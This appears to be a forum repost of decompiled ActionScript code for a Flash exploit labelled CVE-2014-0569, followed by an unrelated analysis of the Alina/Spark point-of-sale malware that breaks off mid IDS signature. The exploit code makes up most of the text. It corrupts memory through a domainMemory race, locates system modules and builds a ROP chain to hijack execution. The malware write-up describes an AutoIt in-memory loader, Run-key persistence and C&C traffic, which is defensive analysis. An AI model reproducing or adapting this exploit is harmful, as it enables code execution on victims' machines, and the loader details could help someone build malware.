[h=1]Exploit.SWF.CVE-2014-0569 Decoded Code[/h]By: physicaldrive0 on Dec 18th, 2014 [LIST=1]package { import flash.events.*; import flash.media.*; import flash.display.*; import flash.geom.*; import flash.utils.*; import flash.text.*; import flash.external.*; import flash.system.*; import flash.net.*; import __AS3__.vec.*; import avm2.intrinsics.memory.*; public class aeryk extends Sprite { private var mort5:Number; private var slotl:uint; private var larkr:uint = 233495534; private var crux1:uint = 200203949; private var whys3a:uint = 0x0800; private var orlyfx:Vector.<Object>; private var bios2t:Vector.<Object>; private var vola1:Sound; private var pokeg:ByteArray; private var magif:Vector.<Object>; private var rant2p:uint = 0; private var fray6u:Vector.<uint>; private var hugh1:uint; private var rugau8:uint; private var bonom:uint; private var gleeuo:uint; private var wombu3:uint; private var talis0:uint; private var dawnod:uint; private var fund2:uint; private var jump4:uint; private var dipseu:uint; private var buttkk:uint; private var modsj:uint; private var sobsft:uint; public function aeryk(){ var _loc2_ = 0; this.orlyfx = new Vector.<Object>(this.whys3a); this.bios2t = new Vector.<Object>(this.whys3a); this.magif = new Vector.<Object>(this.whys3a); super(); var _loc1_ = this.loaderInfo.parameters.kosoz; if ((((_loc1_ == null)) || (!(this.pawn2c(116, 150))))){ return; }; this.vola1 = new Sound(); this.pokeg = new ByteArray(); this.pokeg.endian = Endian.LITTLE_ENDIAN; this.pokeg.length = 65536; this.birdzu(); try { this.want2d(_loc1_); } catch(error:Error) { return; }; this.pisa8(); try { var _local2 = this.manei(); _loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.textline(1, "point4.5"); _local2 = this.grity(); _loc2_ = _local2; if (_local2 != 0){ this.textline(1, "premature exit, 4.5"); this.quodo0(); return; }; if (!(this.midin())){ this.quodo0(); return; }; if (!(this.weilwk())){ this.quodo0(); return; }; _local2 = this.modo55(); _loc2_ = _local2; if (_local2 != 0){ this.quodo0(); return; }; this.gadsi(); this.kahncl(); this.quodo0(); } catch(error:Error) { textline(2, ((("errormsg: " + error.name) + " ") + error.message)); return; }; } public function textline(lnum:uint, text:String):void{ } public function pawn2c(param1:Number, param2:Number):Boolean{ var _loc3_ = Capabilities.version.toLowerCase().split(" "); if (_loc3_[0] != "win"){ return (false); }; this.mort5 = Number(_loc3_[1].substr(0, 4).split(",").join("")); if ((((this.mort5 < param1)) && ((this.mort5 > param2)))){ return (false); }; return (true); } private function birdzu():void{ this.slotl = 0x90909090; } public function hexdump(bytes:ByteArray, start:uint=1, length:uint=0):String{ var byte:int; var output:String = ""; var charbuf:String = ""; if (start == 0){ start = 1; }; if ((((length > bytes.length)) || ((length == 0)))){ length = bytes.length; }; bytes.position = (start - 1); var i:int = start; while (i < (length + 1)) { byte = bytes.readByte(); if ((((byte > 20)) && ((byte < 123)))){ charbuf = (charbuf + String.fromCharCode(byte)); } else { charbuf = (charbuf + "."); }; output = (output + (this.byte2hex(byte) + " ")); if ((i % 16) == 0){ output = (output + (("\t" + charbuf) + "\n")); charbuf = ""; }; i++; }; if ((i % 16) != 0){ while ((i % 16) != 0) { output = (output + " "); i++; }; output = (output + " "); output = (output + (("\t" + charbuf) + "\n")); }; return (output); } public function byte2hex(byte:uint):String{ var hex:String = ""; var arr:String = "FEDCBA"; var i:uint; while (i < 2) { if (((byte & (240 >> (i * 4))) >> (4 - (i * 4))) > 9){ hex = (hex + arr.charAt((15 - ((byte & (240 >> (i * 4))) >> (4 - (i * 4)))))); } else { hex = (hex + String(((byte & (240 >> (i * 4))) >> (4 - (i * 4))))); }; i++; }; return (hex); } private function want2d(param1:String):void{ var _loc4_:uint; var _loc5_:uint; var _loc6_ = 0; var _loc2_ = "_w2fPjM9CaS1b-KWLkcpATG8IuelEJR7ovm3hndqQ5D6XUF0ztgONiyxYrsBV4ZH"; this.pokeg.position = 1208; var _loc3_:uint; var n:ByteArray = new ByteArray(); n.length = (param1.length + 1); while (_loc3_ < param1.length) { _loc4_ = 0; _loc5_ = 0; while (_loc5_ < 4) { _loc6_ = _loc2_.indexOf(param1.charAt((_loc3_ + _loc5_))); _loc6_ = (_loc6_ & 63); _loc4_ = (_loc4_ | (_loc6_ << ((3 - _loc5_) * 6))); _loc5_++; }; _loc5_ = 0; while (_loc5_ < 3) { this.pokeg.writeByte(((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF)); n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc5_++; }; n[(_loc3_ + _loc5_)] = ((_loc4_ >> ((2 - _loc5_) * 8)) & 0xFF); _loc3_ = (_loc3_ + 4); }; this.textline(1, "try hexdump"); this.textline(3, this.hexdump(this.pokeg, 1208, param1.length)); this.textline(1, "try done"); } private function pisa8():void{ var _loc1_:ByteArray; var _loc2_:Vector.<uint>; var _loc3_:uint; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.magif[_loc3_] = new Vector.<Object>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { this.bios2t[_loc3_] = new Vector.<uint>(); _loc3_++; }; _loc3_ = 0; while (_loc3_ < this.whys3a) { _loc2_ = (this.bios2t[_loc3_] as Vector.<uint>); _loc2_.length = 1022; _loc2_[0] = this.crux1; _loc2_[1] = _loc3_; _loc1_ = new ByteArray(); _loc1_.length = 0x1000; _loc1_.endian = Endian.LITTLE_ENDIAN; _loc1_.position = 8; _loc1_.writeUnsignedInt(this.larkr); _loc1_.writeUnsignedInt(_loc3_); this.orlyfx[_loc3_] = _loc1_; _loc3_++; }; } private function manei():uint{ var pos:uint; var _loc2_:uint; var _loc3_:ByteArray; var _loc4_:Vector.<uint>; pos = uint((this.whys3a / 2)); var startpos:uint = pos; while (pos < this.whys3a) { _loc3_ = (this.orlyfx[pos] as ByteArray); ApplicationDomain.currentDomain.domainMemory = _loc3_; _loc3_.atomicCompareAndSwapLength(0x1000, 0); if (casi32(0x1000, 1022, 0x40000001) == 1022){ _loc2_ = (uint((this.whys3a / 2)) - 0x0100); while (_loc2_ < this.whys3a) { _loc4_ = (this.bios2t[_loc2_] as Vector.<uint>); if (_loc4_.length == 0x40000001){ this.fray6u = _loc4_; return (0); }; _loc2_++; }; }; pos++; }; return (1); } private function quodo0():void{ if (this.fray6u){ if (((this.bonom) && (this.gleeuo))){ this.sacs1y(this.bonom, this.gleeuo); }; if (this.rugau8){ this.fray6u[1073741823] = this.rugau8; }; this.fray6u[1073741822] = 1022; } else { do { } while (1); }; } public function fullk(param1:uint, param2:uint, param3:uint):uint{ var _loc4_:uint = (param1 >>> (8 * param3)); var _loc5_:uint = (((param3 == 0)) ? 0 : (param2 << ((4 - param3) * 8))); return ((_loc5_ | _loc4_)); } public function intog(param1:uint):uint{ var _loc2_:uint; var _loc3_:uint = (param1 % 4); param1 = (param1 - _loc3_); if (param1 >= this.hugh1){ _loc2_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc2_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; var _loc4_:uint = this.fray6u[_loc2_]; if (_loc3_ == 0){ return (_loc4_); }; var _loc5_:uint = this.fray6u[(_loc2_ + 1)]; return (this.fullk(_loc4_, _loc5_, _loc3_)); } public function sacs1y(param1:uint, param2:uint):void{ var _loc3_:uint; if (param1 >= this.hugh1){ _loc3_ = (((param1 - this.hugh1) - 8) / 4); } else { _loc3_ = (0x40000000 - (((this.hugh1 + 8) - param1) / 4)); }; this.fray6u[_loc3_] = param2; } private function boobe():void{ var _loc2_:Vector.<Object>; var _loc1_:uint; while ((((_loc1_ < 30)) && ((this.rant2p < this.whys3a)))) { _loc2_ = (this.magif[this.rant2p] as Vector.<Object>); _loc2_.length = 30; _loc2_[1] = this.vola1; _loc2_[2] = this.pokeg; this.rant2p++; _loc1_++; }; } private function grity():uint{ var _loc1_:uint; var _loc2_:uint; var _loc3_:uint; var _loc4_:ByteArray; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; _loc1_ = 1; while (_loc1_ < 16) { _loc2_ = (_loc1_ * 0x0400); if (((!(this.hugh1)) && ((this.fray6u[_loc2_] == this.larkr)))){ _loc3_ = this.fray6u[(_loc2_ + 1)]; _loc4_ = (this.orlyfx[_loc3_] as ByteArray); _loc4_.clear(); _loc5_ = 0; while (this.fray6u[_loc2_] == this.larkr) { this.boobe(); if (_loc5_ == 30){ return (5); }; _loc5_++; }; if (((((!((this.fray6u[_loc2_] == this.larkr))) && ((this.fray6u[(((this.mort5 <= 111)) ? (_loc2_ + 2) : (_loc2_ - 1))] == 128)))) && (!(((_loc6_ = this.fray6u[(_loc2_ + 9)]) == 0))))){ this.hugh1 = ((_loc6_ & 0xFFFFF000) - (_loc1_ * 0x1000)); if (this.hugh1 < 65536){ return (6); }; if ((((((this.intog((_loc6_ + 4)) == 30)) && ((this.intog((_loc6_ + 8)) == 1)))) && ((this.intog((_loc6_ + 20)) == 1)))){ this.bonom = (this.intog((_loc6_ + 12)) & 0xFFFFFFF8); this.gleeuo = this.intog(this.bonom); _loc7_ = (this.intog((_loc6_ + 16)) & 0xFFFFFFF8); if (this.mort5 < 114){ this.wombu3 = this.intog((_loc7_ + 56)); } else { _loc7_ = this.intog((_loc7_ + 64)); this.wombu3 = this.intog((_loc7_ + 8)); }; } else { return (7); }; }; } else { if (((!(this.rugau8)) && ((this.fray6u[_loc2_] == this.crux1)))){ this.rugau8 = this.fray6u[(_loc2_ - 1)]; }; }; if (((this.hugh1) && (this.rugau8))){ return (0); }; _loc1_++; }; if (((!(this.hugh1)) && (!(this.rugau8)))){ return (1); }; if (!(this.hugh1)){ return (2); }; if (!(this.rugau8)){ return (3); }; return (4); } public function midin():Boolean{ var _loc1_:uint = (this.gleeuo & 0xFFFF0000); while ((this.intog(_loc1_) & 0xFFFF) != 23117) { _loc1_ = (_loc1_ - 65536); }; this.talis0 = _loc1_; if (this.talis0){ this.dawnod = (this.talis0 + this.intog((this.talis0 + 60))); if ((this.intog(this.dawnod) & 0xFFFF) == 17744){ return (true); }; }; return (false); } public function weilwk():Boolean{ var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc8_:uint; var _loc1_:uint = this.intog((this.dawnod + 28)); var _loc2_:uint = this.intog((this.dawnod + 44)); if (((_loc1_) && (_loc2_))){ _loc2_ = (_loc2_ + this.talis0); _loc3_ = this.intog(_loc2_); _loc4_ = 4; while (_loc4_ < _loc1_) { _loc5_ = this.intog((_loc2_ + _loc4_)); _loc6_ = 0; while (_loc6_ < 4) { _loc7_ = this.fullk(_loc3_, _loc5_, _loc6_); _loc8_ = (_loc7_ & 0xFFFF); if (((!(this.fund2)) && ((_loc8_ == 50068)))){ this.fund2 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.jump4)) && ((_loc8_ == 50009)))){ this.jump4 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.dipseu)) && ((_loc8_ == 49992)))){ this.dipseu = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.modsj)) && ((_loc8_ == 50000)))){ this.modsj = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.buttkk)) && ((_loc7_ == 3277654153)))){ this.buttkk = (((_loc2_ + _loc4_) - 4) + _loc6_); }; _loc6_++; }; _loc3_ = _loc5_; if (((((((((this.fund2) && (this.jump4))) && (this.dipseu))) && (this.buttkk))) && (this.modsj))){ return (true); }; _loc4_ = (_loc4_ + 4); }; }; return (false); } public function modo55():uint{ var _loc2_:uint; var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc1_:uint = (this.talis0 + this.intog((this.dawnod + 128))); while (true) { _loc2_ = this.intog(_loc1_); if (_loc2_ == 0){ break; }; _loc3_ = (this.talis0 + this.intog((_loc1_ + 12))); if (((((this.intog(_loc3_) & 1314014539) == 1314014539)) && (((this.intog((_loc3_ + 4)) & 842222661) == 842222661)))){ _loc4_ = 0; _loc2_ = (_loc2_ + this.talis0); while (true) { _loc5_ = this.intog(_loc2_); if (_loc5_ == 0){ break; }; _loc6_ = ((this.talis0 + _loc5_) + 2); if ((((((this.intog(_loc6_) == 1953655126)) && ((this.intog((_loc6_ + 4)) == 1097621877)))) && ((this.intog((_loc6_ + 8)) == 1668246636)))){ _loc7_ = (this.talis0 + this.intog((_loc1_ + 16))); this.sobsft = this.intog((_loc7_ + (_loc4_ * 4))); return ((((this.sobsft == 0)) ? 4 : 0)); }; _loc2_ = (_loc2_ + 4); _loc4_++; }; return (3); }; _loc1_ = (_loc1_ + 20); }; return (2); } private function gadsi():void{ this.pokeg.position = 0; var _loc1_:uint; while (_loc1_ < 27) { this.pokeg.writeUnsignedInt((this.jump4 + 1)); _loc1_++; }; this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.fund2); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.slotl); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.wombu3 + 1208)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(276335968); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3242323591); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3271837833); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(833423561); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272099977); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(4134906824); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272362121); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(64); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.jump4 + 1)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.sobsft); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.fund2); } private function kahncl():void{ this.sacs1y(this.bonom, this.wombu3); new Number(this.vola1.toString()); } } }//package [/LIST] Sursa: Exploit.SWF.CVE-2014-0569 Decoded Code - Pastebin.com

Alina POS malware "sparks" off a new variant Alina is a well-documented family of malware used to scrape Credit Card (CC) data from Point of Sale (POS) software. We published a series of in-depth write-ups on the capabilities Alina possesses as well as the progression of the versions. Xylitol has a nice write-up on the Command and Control (C&C) aspects of Alina. In this blog post I’d like to discuss a variant that first cropped up in late 2013 and has been seen in the wild as recent as a month ago. Some anti-virus companies have identified similar samples as JackPOS, but there are several interesting behavior differences that haven’t been posted about in any other write-ups. It is clear that Alina, JackPOS, and this variant all bear close resemblances to each other, but there are behavioral differences that distinguish this version from the others which I have not seen detailed elsewhere. For the purposes of this write-up I will be referring to this variant as Spark. AutoIt Staged Loader The first and most interesting difference between Alina and Spark is that several of the samples have been found embedded in a compiled AutoIt script, which then loads the malware into memory. Both Security Affairs and Security Intelligence posted about a similar type of AutoIt compiled script being used as a loader with a JackPOS binary instead of Spark here and here, but did not provide many details. We will take a closer look at how the loader works. AutoIt "is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting". This AutoIt script contains functions to allocate space in memory, map a binary into that memory, fix the relocations and Import Address Table, and execute the binary. A malicious binary is concatenated into a variable 4,000 bytes at a time and the script's functions are used to load and execute it. The script is converted into a windows executable by running the utility Aut2Exe, which produces a new binary with the malware inside it. Figure 1: Compiling an AutoIt Script Converting a script into an executable is a normal and useful part of AutoIt’s functionality. I used a third party utility called Exe2Aut to recover the original script and retrieve the binary. Figure 2: Decompiling an AutoIt Script The use of AutoIt as a loader is an interesting tactic. We typically see malware authors writing a script to execute another binary on the system or perform some function needed to accomplish the dastardly deed the author set out to do. This script is then compiled using Aut2exe for AutoIt, py2exe for python, or perl2exe for perl. These programs include their respective interpreters in the compiled binary for executing the script and are generally considered to be unsophisticated malware. In this case, however, the script has a binary in a variable that is loaded into dynamic memory and fixes up all the addresses required for execution. This is a much more advanced technique and is reusable with different embedded binaries. Like all such loaders, the binary is initially obfuscated artifacts such as strings and import tables from the malicious binary. Startup Previous versions of Alina picked a name from a list of legitimate sounding executable names and copied itself into the oh-so-common %APPDATA% folder under the chosen name. Instead, Spark creates a sub-folder in (surprise) %APPDATA% called “Install” and stores its malicious goodies in there. These malicious goodies include copying the original executable to %APPDATA%/Install/hkcmd.exe and writing a file called ntfs.dat. Spark will always copy itself as hkcmd.exe as opposed to previous Alina versions that selected from a list of varying names. Figure 3: Spark Install Directory At startup, the malware builds the path to %APPDATA%/Install/ntfs.dat and checks to see if the file exists. If the file does not exist, it uses the systems volume serial id and overwrites the first 6 digits with random upper and/or lower case characters. The result of this operation is written to ntfs.dat and is used as the unique ID for the bot. Here is an example: Volume ID => “602C0256” Random chars => “mRtyfo” Unique ID => “mRtyfo56” Figure 4: Random Character Generation This differs from earlier variants, which just used the volume serial id to identify the bot. If the ntfs.dat does exist, the identifier is read into memory. This unique identifier is included in the POST message for all communication with the C&C server. Like all the other versions of Alina, Spark also adds itself to the commonly used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hkcmd key in order to maintain persistence through reboot. Spark uses a named pipe to synchronize moving the malware from its original execution folder to the %APPDATA%/Install directory. The pipe name is generated as \\.\pipe\spark<uniqueID> where <uniqueID> is the same as what is generated above. Using our previous example the pipe name would be \\.pipe\sparkmRtyfo56. Black List Alina includes a black list of processes that are not scraped for CC data. Spark takes the same black list as before and adds additional applications to the list: Figure 5: Black List Differences Since the author is looking for CC data, the choice to add additional processes is an easy one since these applications are highly unlikely to contain the data they are seeking. The majority of the additions are system and common processes. Spark Execution Flow Here is a general picture overview of Spark’s execution flow: Figure 6: Spark Execution Flow Communication The final two differences in this variant have to do with communication to the C&C server. Where previous versions used “Alina vx.x” as the User-Agent, Spark now uses something that is supposed to look legitimate. Figure 7: Spark POST Example As you can see, in their attempts to look legitimate, the author still includes the bot version but forgets to include the closing parenthesis. Here is an IDS signature that has been used to detect Spark. alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN JackPOS Checkin"; flow:established,to_server; 